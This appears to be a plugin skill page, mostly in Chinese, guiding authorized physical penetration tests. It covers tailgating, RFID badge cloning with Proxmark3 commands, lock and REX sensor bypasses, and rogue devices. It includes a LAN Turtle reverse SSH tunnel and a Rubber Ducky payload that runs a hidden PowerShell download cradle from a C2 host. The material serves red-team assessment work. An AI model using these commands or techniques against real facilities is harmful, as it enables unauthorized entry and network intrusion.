Performs authorized physical penetration tests via tailgating, RFID badge cloning, lock bypassing, and rogue device deployment to assess facility security controls.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
物理入侵评估通过尝试未授权进入设施、服务器机房和受限区域来评估组织的物理安全控制措施。这包括尾随员工、克隆 RFID 门禁卡、绕过锁具、部署流氓网络设备以及测试安保人员程序。物理安全测试是全范围红队演练的关键组成部分,因为它通常提供最直接的网络访问路径。MITRE ATT&CK 将物理访问技术映射至 T1200(硬件添加)和 T1091(通过可移动介质复制)。
Guides authorized physical penetration testing via tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls. Useful for red team assessments.
Guides authorized physical penetration testing with tailgating, RFID badge cloning, lock bypassing, rogue devices to evaluate facility security controls.
Guides authorized social engineering tests with phishing, pretexting, vishing, and physical techniques like tailgating and dumpster diving. Covers campaign workflow and reporting.
Share bugs, ideas, or general feedback.
物理入侵评估通过尝试未授权进入设施、服务器机房和受限区域来评估组织的物理安全控制措施。这包括尾随员工、克隆 RFID 门禁卡、绕过锁具、部署流氓网络设备以及测试安保人员程序。物理安全测试是全范围红队演练的关键组成部分,因为它通常提供最直接的网络访问路径。MITRE ATT&CK 将物理访问技术映射至 T1200(硬件添加)和 T1091(通过可移动介质复制)。
| 技术 ID | 名称 | 战术 |
|---|---|---|
| T1200 | 硬件添加 | 初始访问 |
| T1091 | 通过可移动介质复制 | 初始访问 |
| T1199 | 可信关系 | 初始访问 |
| T1078 | 有效账户 | 初始访问 |
| 工具 | 用途 | 大概费用 |
|---|---|---|
| Proxmark3 RDV4 | RFID 门禁卡克隆(125kHz/13.56MHz) | $300 |
| Flipper Zero | 多协议 RF 分析 | $170 |
| 开锁工具套装(Sparrows) | 机械锁绕过 | $35 |
| 门底工具(UDT) | 从外部绕过门锁 | $30 |
| 撬锁刀 / 插销滑片 | 弹簧锁舌绕过 | $15 |
| LAN Turtle | 流氓网络植入物 | $60 |
| WiFi Pineapple | 流氓无线接入点 | $100 |
| Rubber Ducky / Bash Bunny | USB 按键注入 | $50-80 |
| 夹板 + 安全帽 + 荧光背心 | 社会工程学道具 | $20 |
| 随身摄像机 | 证据记录 | $50 |
尾随是指跟随授权人员通过安全入口,而不出示凭据。
方法:
需测试的防御措施:
# Proxmark3 - 读取低频(125kHz)HID 卡
proxmark3> lf hid read
# 输出:HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# 克隆到 T5577 空白卡
proxmark3> lf hid clone --fc 123 --cn 45678
# 读取高频(13.56MHz)MIFARE 卡
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# 使用自定义天线进行远距离捕获(最远 3 英尺)
proxmark3> lf hid read # 使用扩展天线
# Flipper Zero - 读取和模拟
# RFID > 读取 > 将卡靠近 Flipper > 保存 > 模拟
门禁卡克隆攻击流程:
| 锁具类型 | 绕过方法 | 难度 |
|---|---|---|
| 弹子锁(标准) | 撬锁、耙锁或碰撞钥匙 | 易-中 |
| 片状锁(文件柜) | 撬锁或摇动 | 易 |
| 管状锁(自动售货机、服务器) | 管状撬锁工具 | 易 |
| 电子锁(键盘) | 肩窥、热成像摄像机 | 中 |
| 磁力锁(mag lock) | 门底工具、REX 传感器绕过 | 中 |
| 智能锁(蓝牙) | 重放攻击、固件漏洞 | 难 |
# 电子键盘 - 使用后进行热成像
# 温度较高的按键 = 最近按过的按键
# 在 30 秒内使用 FLIR 摄像机捕获热特征
# REX(请求退出)传感器绕过
# 插入细线或使用压缩空气罐触发
# 磁力门锁内侧的运动传感器
# LAN Turtle - 插入暴露的以太网端口
# 通过 SSH 反向隧道连回 C2 服务器
# 自动配置为中间人
# 配置 LAN Turtle 进行反向 SSH
# 模块:AutoSSH
# 主机:c2.redteam.com
# 端口:22
# 远程端口:2222
# WiFi Pineapple - 部署在公共区域
# 通过邪恶双胞胎攻击捕获无线凭据
# 通过蜂窝调制解调器泄露数据
# USB Rubber Ducky - 丢在停车场或放在桌上
# 载荷:下载并执行 C2 代理
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
在外部废物容器和回收箱中搜索: